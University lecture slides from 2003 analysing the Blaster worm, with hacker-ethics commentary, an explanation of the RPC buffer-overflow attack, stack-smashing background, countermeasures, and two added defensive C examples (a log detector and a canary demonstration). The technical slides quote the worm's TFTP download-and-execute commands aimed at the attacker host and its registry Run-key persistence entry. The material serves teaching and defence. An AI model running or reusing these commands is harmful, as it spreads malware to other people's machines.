Analysis of the Internet Worm of August 2003 INFORMATION AND COMPUTER SCIENCE DEPARTMENT Dr. K. Salah September 2003

Analysis of the Internet Worm of August 2003

INFORMATION AND COMPUTER SCIENCE DEPARTMENT

Dr. K. Salah

September 2003


Agenda

• Reasons for Talk

• Some Jargon

• Ethics of Hackers

• Why Can’t Our Kids Hack?

• Example of Hacker Attacks

• W32 Blaster Worm

• Smashing the Stack for Fun and Profit

• More Information


Reasons for Talk

• Know Your Enemy!

– The Prophet of Islam says, "Whoever learns the language of a people is safe from their cunning" (من تعلم لغة قوم أمن مكرهم).

– "Know your enemy and know yourself and you can fight a hundred battles without disaster," Sun Tzu.

• Knowledge is power!

– Understand hack tactics, strategies, and tricks.

– Be better prepared

– Design and write better code

– Take countermeasures.

• Know something about the ethics of hackers

• Testify how smart the hackers are!

• Research


Some Jargon

• Hoax vs. Worm vs. Virus

• Trojan Horse

• Crackers vs. Hackers vs. Intruder

• DOS attack


The Hacker Ethic

• Hackers have ethics, according to Socrates.

• "The Hacker Ethic", by Pekka Himanen, Linus Torvalds, and Manuel Castells.

– Translated into 15 languages

– Hackers are the warriors, explorers, guerrillas, and joyous adventurers of the Digital Age, and the true architects of the new economy. Demonized and often misunderstood, they are changing the world and the way it works.

– Hackers are curious and often smart. They might not agree with a law, or offer a different interpretation, or act in ways the law doesn't cover.

– http://www.hackerethic.org

– http://www.ils.unc.edu/gbnewby/ethics/index.html

• Why hacking?

• Enjoy the challenge and excitement

• Joy, fun, ego, and recognition

• Hate Microsoft products and practices

– The battle with google.com has started


Hacker Ethics

• Information should be free

– Driving Linux/Apache and Open Source Code

– Technology is only good if you get other people to join you in developing and using it. Info should always be disclosed.

– Not all people can afford to buy software or information

– No concern for copyright laws/abuses, intellectual property, passwords, data security!

• Hacking is essential to show security holes and vulnerabilities

– So many hackers are security gurus

– A way to make a living and learn about computers

• Hackers are not doing real harm

– Pushing technology to its knees

– "We are just curious and inquisitive people… we want to chart new territory and look around," Craig Neidorf

– Craig Neidorf is the founder of Phrack Magazine and member of the 2600 club. His email is [email protected]


Kids and Hacking

• Kids are very curious, thus are hackers.

• Have much more time, fewer responsibilities!

• They look for recognition and fun

• Usually kids fall victims and get caught first

• Originators of attacks are yet to be found

• What does it really take to be a hacker?

– Some knowledge of C and Assembly programming

– Some knowledge of OS

– Some knowledge of Networking (TCP/IP)

– (Beware!!! These are our ICS and COE students!!!)


Kids and Hacking

[Screenshot slides; the only visible text reads "Connected to www.test.com" and "www.test.com".]


Kids and Hacking

• Shall we give up hope?

– The 1998 registrar incident

• So, why can't our kids hack?

– Digital Divide

– English

– Busy and distracted….


Fun, Attacks, or Damages

[Screenshot slides; the captions read "August 17, 1996" and "August 14, 2003".]


The Blaster Worm

• Affected Windows XP and Windows 2000

• Causes Windows NT to crash when trying to exploit NT machines

• Has so many variants: Blaster-A, Blaster-B, … Blaster-F

– Blaster-F was linked to a Romanian student

• This is a worm, not a virus; it eats up network bandwidth.

• Encouraged other hackers to release other worms: Sobig, Welchia, etc.

• Microsoft called it, “A security issue has been identified…”


Technical Details

1) An infected system scans the network for any computer listening to TCP port 135 (Windows RPC/DCOM port).

– TCP port 135 used for Microsoft Active Directory and Microsoft Exchange mail servers, among other things.

– “The Art of Port Scanning” by [email protected] Phrack Magazine, http://www.phrack.org/show.php?p=51&a=11

[Diagram: the Infected Host sends "135?" probes to each Target Host.]


Technical Details

2) The infected system attempts to exploit the RPC buffer overflow on those systems listening to TCP port 135.

– Buffer Overflow Attack will be explained later

[Diagram: the Infected Host sends the RPC Buffer Overflow to the Target Host on TCP port 135; the Target Host then listens on TCP port 4444.]


Technical Details

3) The buffer overflow includes code which causes the victim to open a cmd.exe shell (an "egg") and makes it "hatch":

– starts a TFTP session with the attacker between ports 4444 and 69 to download a copy of the worm "msblast.exe"

– Inside the shell code, do a command: "cmd \c tftp –i appaddress worm.exe & worm.exe & exit"

– "msblast.exe" is packed with the UPX compression utility; it is self-extracting and is 11KB once unpacked.

[Diagram: (1) the Target Host runs "tftp attackerIP GET msblast.exe" against UDP port 69 on the Infected Host; (2) msblast.exe gets downloaded; (3) worm.exe is executed. Ports shown: 135 and 4444.]


Technical Details

4) “msblast.exe” gets executed and starts the scanning process for those computers listening on TCP port 135.

– A text string in the worm code reads, “I just want to say LOVE YOU SAN!! Billy gates why do you make this possible? Stop making money and fix your software!!”

– The code creates a mutex called “BILLY” to avoid running multiple times.

– It also adds a registry entry so that it always runs on Windows restart: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = "msblast.exe"

[Diagram: each newly Infected Host in turn sends "135?" probes to further hosts.]


Technical Details

• A secondary payload in the worm is supposed to cause all infected systems to launch a DoS attack against the MS windowsupdate.com website on 16 August 2003.

– Why August 16?

– Any relation to the DOJ Hack?

• If the worm cannot find a DNS entry for windowsupdate.com, it uses 255.255.255.255, causing broadcast traffic and flooding the network.
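The four steps above describe the worm's network behaviour on TCP port 135, TCP port 4444 and UDP port 69, and that sequence can be looked for in connection logs. The following C program is an added example (not code from the talk): it scores each source host over constructed sample log lines and flags the ones that match the pattern; the log format, the probe threshold and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
/* Constructed sample connection-log lines (not from the talk), format "src dst proto dport". */
static const char *SAMPLE_LOG[] = {
    "10.0.0.7 10.0.0.20 TCP 135",
    "10.0.0.7 10.0.0.21 TCP 135",
    "10.0.0.7 10.0.0.22 TCP 135",
    "10.0.0.7 10.0.0.23 TCP 135",
    "10.0.0.7 10.0.0.23 TCP 4444",  /* follow-up connection to the shell opened by the overflow */
    "10.0.0.23 10.0.0.7 UDP 69",    /* victim fetches msblast.exe from the attacker by TFTP */
    "10.0.0.9 10.0.0.30 TCP 135",   /* a single RPC connection: ordinary Windows traffic */
    "10.0.0.9 10.0.0.30 TCP 80",
};
#define SAMPLE_LINES ((int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]))
#define MAX_HOSTS 64
struct host_stat { char ip[16]; int rpc_probes; int shell_4444; int tftp_69; };
/* Find or create the record for ip; NULL when the table is full. */
static struct host_stat *stat_for(struct host_stat *t, int *n, const char *ip) {
    for (int i = 0; i < *n; i++)
        if (strcmp(t[i].ip, ip) == 0) return &t[i];
    if (*n >= MAX_HOSTS) return NULL;
    memset(&t[*n], 0, sizeof t[*n]);
    strncpy(t[*n].ip, ip, sizeof t[*n].ip - 1);  /* bounded copy; memset left the terminator */
    return &t[(*n)++];
}
/* Flag a source that made at least probe_threshold TCP/135 connections and then either
   connected to a target's TCP/4444 or was contacted on UDP/69. Returns the suspect count. */
int find_blaster_suspects(const char **log, int lines, int probe_threshold,
                          char out[][16], int max_out) {
    struct host_stat table[MAX_HOSTS]; int n = 0, found = 0;
    for (int i = 0; i < lines; i++) {
        char src[16], dst[16], proto[8]; int dport;
        if (sscanf(log[i], "%15s %15s %7s %d", src, dst, proto, &dport) != 4) continue;
        struct host_stat *s = stat_for(table, &n, src), *d = stat_for(table, &n, dst);
        if (!s || !d) break;
        if (strcmp(proto, "TCP") == 0 && dport == 135)  s->rpc_probes++;
        if (strcmp(proto, "TCP") == 0 && dport == 4444) s->shell_4444++;
        if (strcmp(proto, "UDP") == 0 && dport == 69)   d->tftp_69++;  /* credit the TFTP server side */
    }
    for (int i = 0; i < n && found < max_out; i++)
        if (table[i].rpc_probes >= probe_threshold && (table[i].shell_4444 || table[i].tftp_69))
            memcpy(out[found++], table[i].ip, sizeof table[i].ip);
    return found;
}
int main(void) {
    char out[MAX_HOSTS][16];
    int k = find_blaster_suspects(SAMPLE_LOG, SAMPLE_LINES, 3, out, MAX_HOSTS);
    for (int i = 0; i < k; i++) printf("Blaster-like scanner: %s\n", out[i]);
    return 0;
}
```

The threshold counts TCP/135 connection attempts per source, not distinct targets, so on a real log it should be tuned against the normal RPC traffic of domain controllers and Exchange servers, which the slides note also use port 135.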


Buffer Overflow Attack

• First Rule of Hacking: Do everything you are not supposed to?

– If you can't change the flow of execution, crash it!

• Started with Robert Morris worm in 1988 exploiting a buffer overflow vulnerability in fingerd.

• Code Red worm of 2001, exploiting a buffer overflow vulnerability in Microsoft IIS (Internet Information Server).

• The new MS Blaster of 2003, exploiting a buffer overflow vulnerability in MS DCOM/RPC.

• The next attack will most likely be linked to a buffer overflow

[Chart: CERT security alerts by year, up to the first 2 months of 2002.]


Buffer Overflow Attack

• The best article on the know-how details of the buffer overflow can be found in Phrack Magazine (issue 49), published in 1996: "Smashing the Stack for Fun and Profit," by [email protected], http://www.phrack.org/show.php?p=49&a=14


Buffer Overflow Attack

[Stack layout figure: from the bottom of the stack (top of memory) toward the top of the stack (bottom of memory) the frame holds c = 3, b = 2, a = 1, ret address, sfp, buffer [5], buffer [10]. The slide's arrows read "Stack grows upward" (toward the top of the stack, i.e. lower addresses) and "Buffer grows downward" (writes into a buffer run toward higher addresses, i.e. toward sfp and the return address).]


Buffer Overflow Attack

[Stack layout figure for a function taking a single pointer argument: from the bottom of the stack (top of memory) toward the top of the stack (bottom of memory) the frame holds *str, ret address, sfp, buffer [16]. The same arrows apply: "Stack grows upward", "Buffer grows downward" (toward sfp and the return address).]


Buffer Overflow Attack

Partial List of Unsafe Functions in the Standard C Library:


Buffer Overflow Attack Countermeasures

• Validate all arguments or parameters received whenever you write a function.

– Bounds checking

– Performance is compromised!!

• Use secure functions instead, e.g., strncpy() and strncat()

• Use safe compilers

– Watch out for free compilers!!! Can be made by hackers, for hackers!

• Test your code thoroughly

• Keep applying patches

• A good site for advisories is CERT at the Carnegie Mellon SWE Institute

– http://www.cert.org/advisories

Can this attack ever be eliminated?


Research on Protecting the Stack

• A good number of references is found in:

– http://www.crhc.uiuc.edu/EASY/Papers02/EASY02-xu.pdf

• How?

– Splitting the control stack from the data stack

• Control stack contains return addresses

• Data stack contains local variables and passed parameters

– Use middleware software (libsafe) to intercept calls to library functions known to be vulnerable.

– Using StackGuard and StackShield

• Adding more code at the beginning and end of each function

• Check to see if the ret address is altered and signal a violation

– Others

– Performance due to overhead is always an issue!
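As an added example (not code from the talk, and not the StackGuard or StackShield implementation), the following C program models the frame layout from the stack slides as a struct, so the overrun stays inside one object and the program is well-defined. It shows the unchecked copy in the style of strcpy(buffer, str) running over the words above the buffer, the bounds-checked copy from the Countermeasures slide refusing the oversized input, and a StackGuard-style epilogue check detecting the altered canary. The CANARY constant, the placeholder sfp and ret values and the function names are assumptions for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Constructed canary value for illustration; StackGuard uses a per-run random or terminator canary. */
#define CANARY 0xDEADBEEFCAFEBABEull

/* The frame from the slides, modelled as a struct: buffer, then the canary StackGuard
   inserts between locals and control data, then the saved frame pointer and return address. */
struct frame { char buffer[16]; uint64_t canary; uint64_t sfp; uint64_t ret; };

static void frame_init(struct frame *f) {
    memset(f->buffer, 0, sizeof f->buffer);
    f->canary = CANARY; f->sfp = 0x1000; f->ret = 0x4000;  /* placeholder addresses */
}

/* Unchecked copy in the style of strcpy(buffer, str): no bound, so a long str runs past
   buffer into the words above it. The clamp keeps the write inside the struct; strcpy has none. */
static void unchecked_copy(struct frame *f, const char *str) {
    size_t n = strlen(str) + 1;
    if (n > sizeof *f) n = sizeof *f;
    memcpy((char *)f, str, n);
}

/* Countermeasure from the slides: bounds-check before copying. strncpy alone leaves the
   buffer unterminated when str is too long, so reject oversized input and terminate explicitly. */
static int bounded_copy(struct frame *f, const char *str) {
    if (strlen(str) >= sizeof f->buffer) return -1;
    strncpy(f->buffer, str, sizeof f->buffer);
    f->buffer[sizeof f->buffer - 1] = '\0';
    return 0;
}

/* StackGuard-style epilogue check: 1 if the canary was altered, i.e. the return address
   above it can no longer be trusted and the program should abort rather than return. */
static int canary_violated(const struct frame *f) { return f->canary != CANARY; }

int main(void) {
    struct frame f;
    char input[40];
    memset(input, 'A', sizeof input - 1); input[sizeof input - 1] = '\0';  /* 39-byte input */
    frame_init(&f); unchecked_copy(&f, input);
    printf("unchecked copy: canary violated = %d, ret = 0x%llx\n",
           canary_violated(&f), (unsigned long long)f.ret);
    frame_init(&f);
    int rc = bounded_copy(&f, input);
    printf("bounded copy: rc = %d, canary violated = %d\n", rc, canary_violated(&f));
    return 0;
}
```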


The Adventure Continues

• Bypassing the fix for smashing the stack

– Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard

• http://www.immunix.org/documentation.html

– In the May 2000 issue of Phrack Magazine (www.phrack.org)

• "Bypassing StackGuard and StackShield" by Bulba and Kil3r <[email protected]>


Curious about More Hacking Techniques

Compulsory Reading: "Hacking Exposed"


• A copy of this PPT presentation can be found at

– http://www.ccse.kfupm.edu.sa/~salah

• Under the MISC section